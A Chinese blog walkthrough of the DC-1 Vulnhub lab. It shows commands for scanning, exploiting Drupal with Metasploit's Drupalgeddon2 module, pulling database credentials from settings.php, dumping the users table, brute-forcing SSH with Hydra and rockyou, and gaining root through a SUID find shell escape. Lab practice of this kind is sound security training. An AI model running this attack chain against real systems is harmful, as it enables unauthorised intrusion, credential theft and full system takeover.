DC-1

最新推荐文章于 2024-07-24 15:20:08 发布
最新推荐文章于 2024-07-24 15:20:08 发布
阅读量363 收藏 8
点赞数 4
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxxtentaction24/article/details/138526112
版权

1.探测目标DC-1的ip因为已经设置为了NAT模式所以可以通过arp-scan网段进行发现目标IP我这边用的是arp-scan

arp-scan -l

找到对应的物理地址对应ip就是我们的DC-1

2.确定DC-1开放哪些端口

nmap -sV -p- 192.168.106.128


3..查看目标地址的框架

whatweb -v 192.168.106.128

发现存在Drupal框架

4.我们去搜寻这个框架的历史漏洞

有过一个命令执行我们对这个网站进行尝试

5. 使用msf进行尝试

use exploit/unix/webapp/drupal_drupalgeddon2

set RHOSTS 192.168.106.128

exploit

发现确实存在攻击成功

5.获取getshell

Shell

成功

6.进行交互

python -c 'import pty; pty.spawn("/bin/bash")'

我们在ls中发现一个flag1.txt我们尝试查看这个文件

cat flag1.txt

7.根据提示我们去查看他的配置文件通过百度找到存在一个settings.php

查找这个文件cat `find / -name settings.php` 查看到了这个文件

从配置中找到了flag2其中有数据库的密码和账户

8.利用这个文件我们进入他的数据库进行查看

mysql -udbuser -pR0ck3t

我们进行数据库等进行查看在查看对应的表

Show databases;

use drupaldb;show tables;

看到其中存在一个users的表我们对这个表进行查看

select * from users;

找到admin的账户密码

9.利用网站我们可以将密码破解出来

也可以进行对密码的修改这里不提及了

我们在账户中找到了新的提示

10.通过提示我们查找用户信息我们找到了新的flag4存在

11.我们对文件进行爆破他所有端口可能存在的密码

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.106.128

爆破出ssh的密码进行连接

ssh flag4@192.168.106.128

成功登入

查看文件并没有什么收获

利用原来的进行提权

发现我们只是普通用户

12.利用SUID进行提权

find / -perm -u=s -type f 2>/dev/null

find / -name index.php -exec "/bin/sh" \;

提权成功

xxxtentaction24
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-1靶场渗透实验
Alashan12的博客
05-05 1927
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC-DC PCB layout 指导.docx
06-18
1. Bad layout 会导致 EMI 干扰,降低 DC-DC 的性能。因此,需要尽量减少 layout 的噪声和干扰。 2. 开关大电流回路尽量短信号地和大电流(功率地)单独走线,并在芯片 GND 处单点连接。这样可以减少噪声和干扰,...
DC-1靶场详解
苏生要努力
03-12 2845
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
渗透测试-靶机DC-1-知识点总结
qq_38678845的博客
01-11 2717
渗透测试靶机DC-1的知识点总结
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4075
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
靶机DC-1攻略
weixin_43179779的博客
10-07 1128
dc-1靶机靶机攻略
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5502
DC靶机系列渗透教程
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-1实战手把手教详解
逆旅行人的博客
09-04 3184
DC-1 是一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 它旨在为初学者带来挑战,但它的简单程度取决于您的技能和知识以及您的学习能力。 要成功完成这一挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。 有多种获得 root 的方法,但是,我已经包含了一些包含初学者线索的标志。 总共有五个标志,但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要
DC-1靶机渗透
m0_62008601的博客
04-28 3600
攻击机:kali IP:192.168.56.102 靶机:DC-1 IP:192.168.56.101 我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)网络设置的是仅主机网络 kali是在VMware里的,网络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。 在ka...
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4473
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
复现DC-1靶机.pdf
03-22
复现DC-1靶机.pdf
DC-DC变换器Simulink仿真模型
08-07
具体到这个名为"DC_DC_PWM-RECTIFIER1.mdl"的Simulink模型,我们可以推断它是包含脉宽调制(PWM)和整流器功能的DC-DC变换器。PWM技术用于控制开关器件的导通时间,从而改变输出电压的平均值。而整流器则将交流信号...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
_数据中心DC-L1施工质量标准-电气工程v1.0.pdf
09-17
_数据中心DC-L1施工质量标准-电气工程v1.0.pdf
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 525
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
等级保护 总结2
最新发布
qq_25467441的博客
07-24 403
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 975
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 496
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值